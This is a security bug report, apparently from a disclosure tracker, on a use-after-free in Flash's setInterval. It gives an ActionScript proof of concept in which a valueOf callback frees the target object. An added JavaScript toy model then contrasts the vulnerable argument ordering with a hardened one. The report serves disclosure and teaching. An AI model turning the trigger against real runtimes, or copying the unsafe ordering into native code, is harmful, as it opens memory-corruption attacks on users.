There is a use-after-free in setInterval. If the interval length is an object with valueOf defined, this method gets executed, and can delete the object the interval is being set on. A minimal PoC is as follows:
// Keep a handle to the timeline so the valueOf callback can allocate on it.
_global.thiz = this;
var t = _global.thiz;
var tf = t.createTextField("tf", 1, 1, 2, 3, 4);
tf.natalie = intfunc;
// The interval length is an object; coercing it to a number calls func().
setInterval(tf, "natalie", {valueOf: func});
function intfunc(){
trace("tick");
trace(this);
this.text = this;
}
function func(){
// Runs while setInterval is still processing its arguments: free the target...
tf.removeTextField();
trace("after free");
// ...and allocate a replacement that can land in the freed object's slot.
var tf2 = _global.thiz.createTextField("tf2", 5, 1, 2, 300, 400);
tf2.natalie = intfunc;
return 100;
}
This PoC demonstrates the use-after-free because the interval is set on the newly allocated object, even though it was called on the object that was freed. The test fails (demonstrates the vulnerability) if the text "_level0.tf2" appears on the screen. It passes otherwise. I have not been able to make this issue cause a crash, as there does not appear to be anything interesting ever allocated in the same heap slot as the freed object, so I think this issue is probably not exploitable. Reporting it because I am not confident of this, especially on 32-bit platforms.
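The pattern behind the report is a re-entrancy bug: native code takes a reference to the target object, then coerces a script-controlled argument, and the coercion runs script that frees the target before the reference is used. The following is an added example, not code from the report or from the Flash runtime, that models the sequence in plain JavaScript on a toy slot-based "heap" so the effect can be observed and the two argument-handling orders compared. The class name, the `alive` flag, the `setIntervalUnsafe`/`setIntervalSafe` method names and the slot-reuse allocator are all constructed for illustration.

```javascript
// Added example (not from the report): a toy model of the re-entrancy pattern
// behind the bug. The slot-based "heap", the object names and the two
// setInterval variants are constructed for illustration only.
'use strict';

// A tiny "heap": display objects live in numbered slots, and a freed slot is
// reused by the next allocation (the reuse that turns a dangling reference into
// a use-after-free on a real engine).
class ToyRuntime {
  constructor() {
    this.slots = [];     // slot index -> object or null
    this.timers = [];    // registered intervals: {slot, method, ms}
  }

  createTextField(name) {
    let slot = this.slots.indexOf(null);
    if (slot === -1) slot = this.slots.length;
    const tf = { name, slot, alive: true };
    this.slots[slot] = tf;
    return tf;
  }

  removeTextField(tf) {
    tf.alive = false;
    this.slots[tf.slot] = null;
  }

  // Vulnerable order: the target is resolved to its raw slot *before* the
  // interval argument is coerced, so script code in valueOf runs while the
  // native side still holds a reference it never re-validates.
  setIntervalUnsafe(target, method, interval) {
    const slot = target.slot;          // raw reference captured first
    const ms = Number(interval);       // calls interval.valueOf(): script re-enters
    this.timers.push({ slot, method, ms });
    return this.timers.length - 1;
  }

  // Hardened order: coerce every script-controlled argument first, then
  // re-validate the target, and only then hand the reference to native state.
  setIntervalSafe(target, method, interval) {
    const ms = Number(interval);
    if (!target.alive || this.slots[target.slot] !== target) {
      throw new Error('target was freed during argument coercion');
    }
    this.timers.push({ slot: target.slot, method, ms });
    return this.timers.length - 1;
  }

  // Fire a timer once and report which object actually received the call.
  tick(id) {
    const t = this.timers[id];
    const obj = this.slots[t.slot];
    return obj ? obj.name : null;
  }
}

// Replays the report's sequence against one variant: valueOf frees the
// target and allocates a replacement that lands in the same slot.
function run(variant) {
  const rt = new ToyRuntime();
  const tf = rt.createTextField('tf');
  const interval = {
    valueOf() {
      rt.removeTextField(tf);
      rt.createTextField('tf2');  // reuses tf's slot, as tf2 does in the PoC
      return 100;
    },
  };
  try {
    const id = rt[variant](tf, 'natalie', interval);
    return { fired_on: rt.tick(id), error: null };
  } catch (e) {
    return { fired_on: null, error: e.message };
  }
}

console.log(run('setIntervalUnsafe'));  // timer fires on the replacement object
console.log(run('setIntervalSafe'));    // the freed target is rejected
```

With the unsafe ordering the timer fires on `tf2`, the object that inherited the slot, which is the same symptom the report uses as its pass/fail criterion ("_level0.tf2" appearing on screen). The hardened variant shows the usual fix for this class of bug: perform every coercion that can run script before touching native state, then check that the target still exists.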
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Status: Fixed